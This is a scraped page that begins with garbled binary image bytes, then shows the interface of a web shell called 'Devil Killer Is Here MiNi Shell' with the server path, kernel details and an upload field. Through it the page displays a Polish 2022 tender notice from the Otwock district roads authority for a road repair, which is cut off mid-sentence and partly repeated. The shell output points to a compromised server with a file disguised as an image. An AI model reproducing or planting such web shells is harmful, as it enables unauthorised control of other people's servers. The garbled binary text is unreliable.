JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220629/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220629/0023045001-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont drogi powiatowej Nr 2710W na odcinku od drogi krajowej Nr S17 do <br/>mostu na rzece Świder </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">ZARZĄD DRÓG POWIATOWYCH W OTWOCKU</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 014848593</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Bohaterów Westerplatte 36</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Karczew</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">05-480</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL912 - Warszawski wschodni</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zdp@powiat-otwocki.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.bip.powiat-otwocki.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont drogi powiatowej Nr 2710W na odcinku od drogi krajowej Nr S17 do <br/>mostu na rzece Świder </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-9eb62007-f776-11ec-9a86-f6f4c648a056</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00230450</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-06-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00035337/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.7 Remont drogi powiatowej Nr 2710W na odcinku od drogi krajowej S17 do mostu na rzece Świder</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zdpotwock.eb2b.com.pl/edit-auction.html/349213 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Komunikacja między zamawiającym a wykonawcami odbywa się wyłącznie przy<br/>użyciu środków komunikacji elektronicznej zgodnie z art. 61 ustawy, za pośrednictwem elektronicznej platformy zakupowej (dalej:<br/>„Platforma”)<br/>pod adresem: https://zdpotwock.eb2b.com.pl/ , która spełnia wymagania opisane w art. 64 ustawy. Wykonawca zamierzający wziąć<br/>udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na Platformie Zakupowej. Zarejestrowanie <br/>i utrzymywanie konta na Platformie Zakupowej oraz korzystanie z Platformy jest bezpłatne.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne<br/>korzystania z Platformy Zakupowej określa Regulamin<br/>Platformy Zakupowej (dostępny pod adresem internetowym https://platforma.eb2b.com.pl/user/terms<br/>lub https://xx.eb2b.com.pl/user/terms). Wykonawca przystępując do postępowania o udzielenie<br/>zamówienia publicznego tj. bezpłatnie rejestrując się lub logując (w przypadku posiadania konta w<br/>Platformie Zakupowej), akceptuje warunki korzystania z Platformy, określone w Regulaminie oraz uznaje go za wiążący.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>• administratorem Pani/Pana danych osobowych jest Zarząd Dróg Powiatowych w Otwocku z/s w<br/>Karczewie ul. Bohaterów Westerplatte 36, 05-480 Karczew tel. 22 780 64 21<br/>• inspektorem ochrony danych osobowych w Zarząd Dróg Powiatowych w Otwocku jest Pani Daria<br/>Bartnicka, email: iod@powiat-otwocki.pl ,<br/>• Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie zamówienia publicznego,<br/>• odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 8 oraz art. 96 ust. 3 ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych (Dz. U. z 2019 r. poz. 1843),<br/>dalej „ustawa Pzp”;<br/>• Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;<br/>• obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym<br/>określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Pzp;<br/>• w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22<br/>RODO;<br/>• posiada Pani/Pan: na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących; na podstawie art. 16<br/>RODO prawo do sprostowania Pani/Pana danych osobowych **; na podstawie art. 18 RODO prawo żądania od administratora<br/>ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO; prawo do wniesienia skargi do Prezesa Urzędu<br/>Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy<br/>RODO;<br/>• nie przysługuje Pani/Panu: w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych; prawo do<br/>przenoszenia danych osobowych, o którym mowa w art. 20 RODO; na podstawie art. 21 RODO prawo sprzeciwu, wobec<br/>przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania<br/>lub uzupełnienia o których mowa w art 16 rozporządzenia 2016/679 , nie może skutkować zmiana wyniku postępowania o udzielenie<br/>zamówienia ani zmianą postanowień umowy w sprawi Skorzystanie<br/>Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub uzupełnienia o których mowa w art 16 rozporządzenia 2016/679 , nie może skutkować zmiana wyniku postępowania o udzielenie zamówienia ani zmianą postanowień<br/>umowy</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZDP/P-13/2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1) W ramach zamówienia przewiduje się wykonanie następujących robót:<br/>a) Wykonanie nowej nawierzchni jezdni:<br/> Wykonanie robót przygotowawczych poprzez sfrezowanie istniejącej nawierzchni jezdni, wykonanie koryta pod nową<br/>nawierzchnię jezdni,<br/> Wykonanie nowej warstwy mrozoodpornej z piasku o grubości 20 cm na całym odcinku, <br/> Wykonanie stabilizacji cementowo – piaskowej o grubości 15 cm na całym odcinku,<br/> Wykonanie podbudowy z kruszywa łamanego stabilizowanego mechanicznie o frakcji 0-31 mm o grubości 22 cm na całym<br/>odcinku<br/> Wykonanie podbudowy z betonu asfaltowego AC 22P o grubości 10 cm na całym odcinku,<br/> Wykonanie warstwy wiążącej z betonu asfaltowego AC 16W PMB o grubości 6 cm na całym odcinku,<br/> Wykonanie warstwy ścieralnej z betonu asfaltowego AC 11S PMB o grubości 4 cm na całym odcinku,<br/> Należy wykonać nawierzchni jezdni o kształcie daszkowym o pochyleniu poprzeczny wynoszącym 2%, <br/> UWAGA: Zamawiający wymaga, aby warstwę ścieralną nawierzchni jezdni wykonać całą szerokością jezdni,<br/> UWAGA: Roboty budowlane należy prowadzić po opracowaniu, zatwierdzeniu i wprowadzeniu Czasowej Organizacji<br/>Ruchu. Wykonawca jest odpowiedzialny za jej opracowanie, zatwierdzenie i wprowadzenie.<br/> UWAGA: Należy wykonać połączenie między warstwowe emulsją asfaltową <br/>b) Wykonanie na całym odcinku (pomijając miejsca występowania chodnika) po obu stronach jezdni opornika 12 cm x 25 cm<br/>x 100 cm na ławie z oporem z betonu cementowego C12/15 betonowego,<br/>c) Wykonanie obustronnych poboczy o szerokości 1,00 m z kruszywa łamanego o grubości 12 cm stabilizowanego<br/>mechanicznie,<br/>d) Profilowanie rowów na całym odcinku zgodnie z dokumentacją,<br/>e) Wykonanie zajazdów indywidualnych i publicznych o konstrukcji z kostki betonowej o grubości 8 cm na podsypce<br/>cementowo piaskowej o grubości 3 cm oraz podbudowie z kruszywa łamanego frakcji 0-31,5 stabilizowanego mechanicznie<br/>o grubości 20 cm, w przypadku wystąpienia przepustu należy wykonać zasypkę z piasku <br/>f) Wykonanie zatoki autobusowej zgodnie z konstrukcją wskazaną w zakresie wykonania nowej nawierzchni jezdni,<br/>g) Wykonanie chodnika (peronu):<br/> Wykonanie robót rozbiórkowych istniejących elementów chodnika tj. krawężnika, obrzeży, płytek chodnikowych, kostki<br/> Wykonanie robót ziemnych poprzez wykonanie korytowania, koryto musi być wyprofilowane oraz zagęszczone, przy czym<br/>współczynnik zagęszczenia musi wynosić Is≥ 1,0.<br/> Wykonanie podbudowy z kruszywa łamanego frakcji 0-31,5 stabilizowanego mechanicznie o grubości 15 cm <br/> Wykonanie nawierzchni chodnika na podsypce cementowo – piaskowej o grubości 3 cm,<br/> Wykonanie nawierzchni chodnika z kostki betonowej Holland o grubości 6 cm, <br/> Od strony nawierzchni jezdni należy ustawić nowe krawężniki 15 x 30 x100 cm kamienne na ławie z oporem z betonu<br/>cementowego C12/15 betonowego na krawężnik należy ustawić wykonując tzw. „światło” wynoszące 16 cm od strony<br/>nawierzchni jezdni <br/> W pozostałych miejscach tj. innych niż przy nawierzchni jezdni należy ustawić nowe obrzeża uliczne 8 X 30 x 100 cm na<br/>ławie z oporem z betonu cementowego C 12/15, obrzeże należy ustawić wykonując tzw. „światło” wynoszące 5 cm od strony<br/>nawierzchni chodnika,<br/> Od strony nawierzchni jezdni należy na całej szerokości peronu wykonać płytki żółte z wypustkami oraz płytki uszorstnione <br/>h) Wprowadzenie elementów stałej organizacji ruchu<br/> Oznakowanie pionowe należy wymienić na nowe zgodnie z projektem stałej organizacji ruchu, przy czym znaki muszą<br/>posiadać aprobatę techniczną, być zgodny z rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie<br/>szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa i warunków ich<br/>umieszczenia na drogach lub posiadać certyfikat CE potwierdzający spełnienie normy PN-EN 12899-1:2010, materiały na<br/>lica znaków powinny spełniać wymagania zgodne z PN-EN 1289-1:2010. <br/> Oznakowanie poziome należy wykonać w technologii grubowarstwowej chemoutwardzalnej strukturalnej z użycie kulek szklanych dobrze przyczepnej do podłoża zgodni z załączoną organizacją ruchu. Materiał nakładany warstwą o grubości 30,<br/>- 5,0 mm<br/> Wykonawca po wprowadzeniu organizacji ruchu zobowiązany jest do powiadomienia o tym fakcie powiatowego inżyniera<br/>ruchu,<br/>i) Zagospodarowanie pasa drogowego pasami zieleni<br/>1) Szczegółowy opis przedmiotu zamówienia został określony w dokumentacji projektowej <br/>1) W ramach zamówienia przewiduje się wykonanie następujących robót:<br/>a) Wykonanie nowej nawierzchni jezdni:<br/> Wykonanie robót przygotowawczych poprzez sfrezowanie istniejącej nawierzchni jezdni, wykonanie koryta pod nową<br/>nawierzchnię jezdni,<br/> Wykonanie nowej warstwy mrozoodpornej z piasku o grubości 20 cm na całym odcinku, <br/> Wykonanie stabilizacji cementowo – piaskowej o grubości 15 cm na całym odcinku,<br/> Wykonanie podbudowy z kruszywa łamanego stabilizowanego mechanicznie o frakcji 0-31 mm o grubości 22 cm na całym<br/>odcinku<br/> Wykonanie podbudowy z betonu asfaltowego AC 22P o grubości 10 cm na całym odcinku,<br/> Wykonanie warstwy wiążącej z betonu asfaltowego AC 16W PMB o grubości 6 cm na całym odcinku,<br/> Wykonanie warstwy ścieralnej z betonu asfaltowego AC 11S PMB o grubości 4 cm na całym odcinku,<br/> Należy wykonać nawierzchni jezdni o kształcie daszkowym o pochyleniu poprzeczny wynoszącym 2%, <br/> UWAGA: Zamawiający wymaga, aby warstwę ścieralną nawierzchni jezdni wykonać całą szerokością jezdni,<br/> UWAGA: Roboty budowlane należy prowadzić po opracowaniu, zatwierdzeniu i wprowadzeniu Czasowej Organizacji<br/>Ruchu. Wykonawca jest odpowiedzialny za jej opracowanie, zatwierdzenie i wprowadzenie.<br/> UWAGA: Należy wykonać połączenie między warstwowe emulsją asfaltową <br/>b) Wykonanie na całym odcinku (pomijając miejsca występowania chodnika) po obu stronach jezdni opornika 12 cm x 25 cm<br/>x 100 cm na ławie z oporem z betonu cementowego C12/15 betonowego,<br/>c) Wykonanie obustronnych poboczy o szerokości 1,00 m z kruszywa łamanego o grubości 12 cm stabilizowanego<br/>mechanicznie,<br/>d) Profilowanie rowów na całym odcinku zgodnie z dokumentacją,<br/>e) Wykonanie zajazdów indywidualnych i publicznych o konstrukcji z kostki betonowej o grubości 8 cm na podsypce<br/>cementowo piaskowej o grubości 3 cm oraz podbudowie z kruszywa łamanego frakcji 0-31,5 stabilizowanego mechanicznie<br/>o grubości 20 cm, w przypadku wystąpienia przepustu należy wykonać zasypkę z piasku <br/>f) Wykonanie zatoki autobusowej zgodnie z konstrukcją wskazaną w zakresie wykonania nowej nawierzchni jezdni,<br/>g) Wykonanie chodnika (peronu):<br/> Wykonanie robót rozbiórkowych istniejących elementów chodnika tj. krawężnika, obrzeży, płytek chodnikowych, kostki<br/> Wykonanie robót ziemnych poprzez wykonanie korytowania, koryto musi być wyprofilowane oraz zagęszczone, przy czym<br/>współczynnik zagęszczenia musi wynosić Is≥ 1,0.<br/> Wykonanie podbudowy z kruszywa łamanego frakcji 0-31,5 stabilizowanego mechanicznie o grubości 15 cm <br/> Wykonanie nawierzchni chodnika na podsypce cementowo – piaskowej o grubości 3 cm,<br/> Wykonanie nawierzchni chodnika z kostki betonowej Holland o grubości 6 cm, <br/> Od strony nawierzchni jezdni należy ustawić nowe krawężniki 15 x 30 x100 cm kamienne na ławie z oporem z betonu<br/>cementowego C12/15 betonowego na krawężnik należy ustawić wykonując tzw. „światło” wynoszące 16 cm od strony<br/>nawierzchni jezdni <br/> W pozostałych miejscach tj. innych niż przy nawierzchni jezdni należy ustawić nowe obrzeża uliczne 8 X 30 x 100 cm na<br/>ławie z oporem z betonu cementowego C 12/15, obrzeże należy ustawić wykonując tzw. „światło” wynoszące 5 cm od strony<br/>nawierzchni chodnika,<br/> Od strony nawierzchni jezdni należy na całej szerokości peronu wykonać płytki żółte z wypustkami oraz płytki uszorstnione <br/>h) Wprowadzenie elementów stałej organizacji ruchu<br/> Oznakowanie pionowe należy wymienić na nowe zgodnie z projektem stałej organizacji ruchu, przy czym znaki muszą<br/>posiadać aprobatę techniczną, być zgodny z rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie<br/>szczegółowych warunków technicznych dla znaków i sygnałów drogowych oraz urządzeń bezpieczeństwa i warunków ich<br/>umieszczenia na drogach lub posiadać certyfikat CE potwierdzający spełnienie normy PN-EN 12899-1:2010, materiały na<br/>lica znaków powinny spełniać wymagania zgodne z PN-EN 1289-1:2010. <br/> Oznakowanie poziome należy wykonać w technologii grubowarstwowej chemoutwardzalnej strukturalnej z użycie kulek<br/>szklanych dobrze przyczepnej do podłoża zgodni z załączoną organizacją ruchu. Materiał nakładany warstwą o grubości 30,<br/>- 5,0 mm<br/> Wykonawca po wprowadzeniu organizacji ruchu zobowiązany jest do powiadomienia o tym fakcie powiatowego inżyniera<br/>ruchu,<br/>i) Zagospodarowanie pasa drogowego pasami zieleni<br/>1) Szczegółowy opis przedmiotu zamówienia został określony w dokumentacji projektowej <br/>2) Prace należy prowadzić z zachowaniem odpowiednich przepisów i instrukcji bezpieczeństwa pracy przy wykonywaniu<br/>robót budowlanych, Wykonawca zobowiązany jest do opracowania, uzyskania stosownego zatwierdzenia oraz<br/>wprowadzenia Czasowej Organizacji Ruchu na czas budowy. Po zakończonych robotach Wykonawca wprowadzi stałą<br/>organizację ruchu<br/>3) Wykonawca zobowiązany jest do zagospodarowania we własnym zakresie materiałów pochodzących z rozbiórki<br/>4) Wykonawca zobowiązany jest do umieszczenia tablicy informacyjnej przed realizacją inwestycji oraz po jej realizacji<br/>według wzoru określonego przez Zamawiającego, </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45233222-1 - Roboty budowlane w zakresie układania chodników i asfaltowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> d) zdolności technicznej i zawodowej:<br/>a) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w<br/>tym okresie, wykonał należycie, zgodnie z przepisami prawa budowlanego i prawidłowo ukończył co najmniej <br/>1 zamówienie, które dotyczyło wykonania robót budowlanych polegających na przebudowie, rozbudowie, budowie lub<br/>remoncie drogi publicznej minimum klasy Z w zakresie których było wykonanie nawierzchni asfaltowej w dwóch warstwach<br/>o długości nie krótszej niż 500 mb,<br/>b) dysponuje następującymi osobami:<br/> 1 osobą pełniącą funkcje kierownika robót, która posiada uprawnienia budowlane do kierowania robotami w specjalności<br/>drogowej bez ograniczeń lub 